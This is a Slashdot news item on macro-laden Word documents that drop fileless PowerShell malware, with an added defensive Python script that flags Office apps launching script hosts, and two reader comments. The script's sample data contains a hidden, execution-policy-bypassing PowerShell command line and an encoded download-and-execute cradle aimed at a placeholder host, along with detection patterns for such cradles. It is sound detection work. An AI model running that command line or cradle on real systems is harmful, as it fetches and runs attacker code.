Slashdot Mirror


Docs With Malicious Macros Deliver Fileless Malware (csoonline.com)

itwbennett writes: Researchers from Palo Alto Networks warn that attackers are using Word documents with malicious macros and PowerShell to infect computers with fileless malware. The rogue PowerShell script performs a variety of checks on the computer aimed at finding systems that are used to conduct financial transactions and to avoid systems that belong to security researchers as well as medical and educational institutions. "Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat," the Palo Alto researchers said in a blog post. A similar combination of PowerShell and fileless malware was observed last week by researchers from the SANS Institute's Internet Storm Center.
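The chain the summary describes (a macro handing off to PowerShell, which then keeps its payload in memory) still leaves one dependable trace on the endpoint: an Office process creating a script-host child. The following is an added example, not code from the article, Palo Alto Networks or SANS, that triages constructed Sysmon-style process-creation records for that parent/child pair, decodes an -EncodedCommand blob back to script text, and grades each finding by the evasion flags present. Field names follow Sysmon Event ID 1; the indicator list, the sample events and the example.invalid payload are my own assumptions.

```python
"""Triage Office -> script-host launches, the chain behind this campaign.

Added example; the event records below are constructed, Sysmon-style
(Event ID 1) fields, not telemetry from the article.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# -EncodedCommand takes base64 of UTF-16LE script text; capture the blob.
ENC_RE = re.compile(r"-e(ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Evasion markers that usually travel with a memory-only payload. These are
# assumed indicators for this example, not a list taken from the article.
ARG_INDICATORS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (ENC_RE, "encoded command"),
    (re.compile(r"-nop(rofile)?\b", re.I), "profile bypass"),
    (re.compile(r"-e(p|x(ecutionpolicy)?)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(iex|invoke-expression)\b|downloadstring|frombase64string", re.I),
     "download/eval cradle"),
]


def basename(path: str) -> str:
    """Last path component, lower-cased; tolerates either separator or an empty field."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


@dataclass
class Finding:
    event_index: int
    parent: str
    child: str
    indicators: list = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def severity(self) -> str:
        # Office spawning a script host alone deserves a look; two or more
        # evasion markers on top of that is what this campaign looks like.
        return "high" if len(self.indicators) >= 2 else "medium"


def triage(events) -> list:
    """Return a Finding for every event where an Office app spawns a script host."""
    findings = []
    for n, ev in enumerate(events):
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        cmd = ev.get("CommandLine", "")
        decoded = decode_encoded_command(cmd)
        # Scan the raw line and the decoded script, so a cradle hidden in base64 still counts.
        haystack = cmd if decoded is None else cmd + "\n" + decoded
        indicators = []
        for pattern, label in ARG_INDICATORS:
            if pattern.search(haystack) and label not in indicators:
                indicators.append(label)
        findings.append(Finding(n, parent, child, indicators, decoded))
    return findings


# Constructed stage-one payload of the kind such macros hand to PowerShell;
# example.invalid is a reserved name, so nothing here resolves.
STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(STAGE_ONE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    # 0: the campaign's chain: Word launching hidden, encoded PowerShell
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    "-WindowStyle Hidden -EncodedCommand " + ENCODED},
    # 1: benign: Word handing off to the print helper (not a script host)
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
    # 2: an admin running PowerShell from the desktop, not from Office
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile"},
    # 3: Excel launching cmd with no evasion flags: worth a look, lower severity
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_index}: {f.parent} -> {f.child} "
              f"[{f.severity}] {', '.join(f.indicators)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

The parent/child pair is the durable part of the rule: the flags and the cradle text change from campaign to campaign, so they only raise severity rather than gate the alert. Decoding the base64 before matching matters because the whole point of -EncodedCommand is that nothing on the raw command line looks like a download.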

2 of 39 comments

  1. Get one Get Many by rtb61 · Score: 4, Insightful

    I got hit with a bundle of them, one after another after another, over a couple of weeks. I think I likely kept getting them because I did not read them but simply forwarded them to http://www.acma.gov.au/Citizen.... I assume, as part of their spam analysis with a view to prosecution, those went into someone's more law-focused inbox. Forwarding them on to your local authorities might not help much, but it certainly doesn't hurt and it is still more satisfying than just blocking them. It might, just might, lead to keeping the authorities appropriately busy and a prosecution occurring; one can only hope, and a little hope is better than none at all. Oh yeah, and I most certainly do not run M$ Office - Libre Office for me, for many, many reasons, least of which are those much-repeated attacks.

    --
    Chaos - everything, everywhere, everywhen
  2. Re:Word Macros by Anonymous Coward · Score: 4, Insightful

    Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

    There's nothing wrong with macros, per se. The problem is massive design flaws like this:

    "The documents contained macros that, if allowed to run, execute a hidden instance of powershell.exe"

    A macro should be able to perform operations on a document, but there is absolutely no reason why a macro should be able to launch an external executable file. That is stupidity at a mind-boggling level.